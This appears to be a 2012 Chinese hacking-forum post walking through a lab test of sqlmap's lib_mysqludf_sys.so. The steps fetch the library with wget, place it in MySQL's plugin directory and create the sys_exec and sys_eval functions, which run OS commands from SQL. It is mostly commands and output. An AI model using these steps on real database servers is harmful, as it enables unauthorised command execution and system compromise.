切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
294 :SQLMAP lib_mysqludf_sys.so in linux[复制链接]
发表于 2012-10-8 22:35:56 | 显示全部楼层 |!read_mode!
#默认APT-GET安装的MYSQL不可用 限制了
  1. root@Dis9Team:/pen/sql/sqlmap/udf/mysql/linux/32# file lib_mysqludf_sys.so
  2. lib_mysqludf_sys.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
  3. root@Dis9Team:/pen/sql/sqlmap/udf/mysql/linux/32# cp lib_mysqludf_sys.so /var/www/
  4. root@Dis9Team:/pen/sql/sqlmap/udf/mysql/linux/32# /etc/init.d/apache2 start
  5. * Starting web server apache2                                                                                        [ OK ]
  6. root@Dis9Team:/pen/sql/sqlmap/udf/mysql/linux/32#
复制代码

IN SERVER,只是测试一下 如果要尝试在BT5中测试
  1. root@ubuntu:~# apt-get install libmysqlclient15-dev
  2. root@ubuntu:/var/www# wget 5.5.5.7/lib_mysqludf_sys.so
  3. root@ubuntu:/var/www# mv lib_mysqludf_sys.so /usr/lib/mysql/plugin/
复制代码

1.SQL
  1. DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
  2. DROP FUNCTION IF EXISTS sys_get;
  3. DROP FUNCTION IF EXISTS sys_set;
  4. DROP FUNCTION IF EXISTS sys_exec;
  5. DROP FUNCTION IF EXISTS sys_eval;

  6. CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
  7. CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
  8. CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
  9. CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
  10. CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
复制代码

导入:
  1. root@ubuntu:~# mysql -u root -p mysql < 1.sql
  2. Enter password:
  3. root@ubuntu:~# mysql -u root -p
  4. Enter password:
  5. Welcome to the MySQL monitor.  Commands end with ; or \g.
  6. Your MySQL connection id is 75
  7. Server version: 5.1.61-0ubuntu0.10.10.1-log (Ubuntu)

  8. Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

  9. Oracle is a registered trademark of Oracle Corporation and/or its
  10. affiliates. Other names may be trademarks of their respective
  11. owners.

  12. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

  13. mysql> SELECT sys_eval('id');
  14. +----------------+
  15. | sys_eval('id') |
  16. +----------------+
  17. | NULL           |
  18. +----------------+
  19. 1 row in set (0.00 sec)
复制代码

函数目录:
  1. mysql> select * from mysql.func;
  2. +-----------------------+-----+---------------------+----------+
  3. | name                  | ret | dl                  | type     |
  4. +-----------------------+-----+---------------------+----------+
  5. | sys_set               |   2 | lib_mysqludf_sys.so | function |
  6. | sys_exec              |   2 | lib_mysqludf_sys.so | function |
  7. | sys_eval              |   0 | lib_mysqludf_sys.so | function |
  8. | sys_get               |   0 | lib_mysqludf_sys.so | function |
  9. | lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function |
  10. +-----------------------+-----+---------------------+----------+
  11. 5 rows in set (0.00 sec)
复制代码

删除:DROP FUNCTION 名字;
RE:http://www.exploit-db.com/exploits/7856/



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-3 14:53

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部